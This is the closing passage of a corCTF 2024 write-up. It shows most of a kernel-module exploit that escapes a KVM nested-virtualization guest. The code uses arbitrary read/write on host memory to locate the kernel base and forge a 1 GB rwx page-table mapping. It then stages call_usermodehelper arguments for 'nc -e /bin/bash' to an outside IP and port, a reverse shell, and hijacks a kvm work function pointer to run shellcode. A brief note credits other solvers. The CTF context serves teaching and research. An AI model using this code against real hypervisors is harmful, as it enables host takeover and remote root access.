    printk(KERN_INFO "next task pml4 ptr: 0x%llx\n", next_task_pml4_ptr);

    uint64_t kbase = arb_read(curr_vmcs12, next_task + 8) - (0xffffffffa480cdf8ull - 0xffffffffa2e00000ull);
    printk(KERN_INFO "kbase: 0x%llx\n", kbase);

    uint64_t host_guest_base = curr_vmcs12 + hfind_guest_base_offset(physmap_base, curr_vmcs12) * 8;
    printk(KERN_INFO "host guest base address: 0x%llx\n", host_guest_base);

    // 47 - 39
    uint64_t target_pud_addr = next_task_pml4_ptr + ((physmap_base & (0b111111111ull << 39)) >> 39) * 8;
    printk(KERN_INFO "physmap start pud entry addr: 0x%llx\n", target_pud_addr);

    // 39 - 30
    uint64_t target_pud = physmap_base + (arb_read(curr_vmcs12, target_pud_addr) & ~0xfffull);
    printk(KERN_INFO "physmap start pud entry: 0x%llx\n", target_pud);

    uint64_t offset = 0;
    // find free entry in pud
    while (arb_read(curr_vmcs12, target_pud + 8 * offset) != 0) {
        offset += 1;
    }
    uint64_t free_entry = target_pud + offset * 8;
    uint64_t evil_vaddr = (physmap_base & ~0b111111111111111111111111111111111111111ull) | (offset << 30);

    // can't modify existing page entries because of TLB
    printk(KERN_INFO "Filling 0x%llx with 1 GB rwx region starting from physical base 0\n", free_entry);
    printk(KERN_INFO "New evil 1 gb mapping: 0x%llx\n", evil_vaddr);
    arb_write(curr_vmcs12, free_entry, 0xe3);

    // now begin process of writing payload
    // nc -e /bin/bash IP Port
    // HOME=/ TERM=linux PATH=/sbin:/usr/sbin:/bin:/usr/bin
    // 0x0 - | call_usermodehelper location | continuation function | argv (6 qwords) | envp (4 qwords) | strings
    char cmd[0x10] = "/usr/bin/nc";
    char arg0[0x10] = "/usr/bin/nc";
    char arg1[0x18] = "192.168.0.100";
    char arg2[0x8] = "1337";
    char arg3[0x8] = "-e";
    char arg4[0x10] = "/bin/bash";
    char env0[0x8] = "HOME=/";
    char env1[0x10] = "TERM=linux";
    char env2[0x30] = "PATH=/sbin:/usr/sbin:/bin:/usr/bin";

    uint64_t sc_data_offset = 0;
    uint64_t string_offset = 12 * 8;

    arb_write(curr_vmcs12, physmap_base + sc_data_offset, kbase + CALL_USERMODEHELPER_OFFSET);
    sc_data_offset += 8;

    // continuation
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, updatework_orig);
    sc_data_offset += 8;

    write_str(curr_vmcs12, physmap_base + string_offset, cmd, sizeof(cmd));
    string_offset += sizeof(cmd);

    write_str(curr_vmcs12, physmap_base + string_offset, arg0, sizeof(arg0));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(arg0);

    write_str(curr_vmcs12, physmap_base + string_offset, arg1, sizeof(arg1));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(arg1);

    write_str(curr_vmcs12, physmap_base + string_offset, arg2, sizeof(arg2));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(arg2);

    write_str(curr_vmcs12, physmap_base + string_offset, arg3, sizeof(arg3));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(arg3);

    write_str(curr_vmcs12, physmap_base + string_offset, arg4, sizeof(arg4));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(arg4);

    arb_write(curr_vmcs12, physmap_base + sc_data_offset, 0);
    sc_data_offset += 8;

    write_str(curr_vmcs12, physmap_base + string_offset, env0, sizeof(env0));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(env0);

    write_str(curr_vmcs12, physmap_base + string_offset, env1, sizeof(env1));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(env1);

    write_str(curr_vmcs12, physmap_base + string_offset, env2, sizeof(env2));
    arb_write(curr_vmcs12, physmap_base + sc_data_offset, physmap_base + string_offset);
    sc_data_offset += 8;
    string_offset += sizeof(env2);

    arb_write(curr_vmcs12, physmap_base + sc_data_offset, 0);
    sc_data_offset += 8;

    write_str(curr_vmcs12, physmap_base + string_offset, (char *)&shellcode, (&shellcode_end - &shellcode + 7) & ~7);
    uint64_t sc_addr = evil_vaddr + string_offset;
    printk(KERN_INFO "shellcode written at: 0x%llx\n", sc_addr);

    arb_write(curr_vmcs12, curr_kvm_updatework_funcptr_addr, sc_addr);

    // https://bugs.chromium.org/p/project-zero/issues/detail?id=2177#c5 - p0 says 5 minutes
    printk(KERN_INFO "overwriting updatework... give it a few minutes to trigger :clown:\n");
    return 0;
}

static void cleanup_exploit_driver(void)
{
    free_page((uint64_t)vmxon_page);
    free_page((uint64_t)vmcs_page);
    printk(KERN_INFO "exploit unloaded\n");
}

module_init(init_exploit_driver);
module_exit(cleanup_exploit_driver);

By the end of corCTF 2024, there were surprisingly only 2 solves for this challenge. Maybe the daunting challenge description scared people away. Congrats to Billy of Starlabs for taking first blood and to zolutal of Shellphish for the second solve! zolutal wrote a great writeup that I highly recommend - he went down a similar path of targeting page tables, but attacked the EPT entries VMX uses for guest-physical to host-physical address translation instead. Pumpkin from DEVCORE/Balsn also came up with a solve immediately after the CTF ended.

Hope you enjoyed reading this writeup and learned something new! Feel free to let me know if you have any questions or see any mistakes.
